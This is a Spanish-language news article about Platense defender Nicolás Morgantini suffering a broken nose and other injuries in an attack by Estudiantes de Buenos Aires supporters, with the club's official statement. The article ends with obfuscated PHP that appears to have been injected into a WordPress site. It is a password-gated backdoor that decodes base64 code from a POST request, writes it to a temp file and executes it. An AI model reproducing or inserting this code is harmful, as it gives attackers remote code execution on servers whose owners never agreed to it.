Salvaje agresión de la barra de Estudiantes de Buenos Aires a Nicolás Morgantini, jugador de Platense

Foto: Platense

Nicolás Morgantini, defensor de Platense, fue al estadio Ciudad de Caseros para presenciar el partido entre el local Estudiantes y Chacarita Juniors, por el campeonato de Primera Nacional. Su intención era acompañar a su amigo Gianluca Pugliese, actualmente a préstamo del Calamar en el equipo de San Martín.

A la salida, Morgantini fue atacado, igual que otros directivos, familiares de jugadores y allegados de Chacarita Juniors, quienes además sufrieron el robo de sus pertenencias.

Posteriormente, desde Platense informaron que “Morgantini sufrió la fractura de huesos propios de la nariz y múltiples politraumatismos a causa de la agresión recibida. Se encuentra internado en observación, bajo los cuidados y tratamientos del staff médico de nuestro club, al igual que acompañado por directivos de nuestra institución junto a su familia”.

En el comunicado oficial finalizan afirmando: “Desde el Club Atlético Platense repudiamos enérgicamente lo sucedido y exigimos se tomen las medidas que correspondan ante tan grave episodio”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}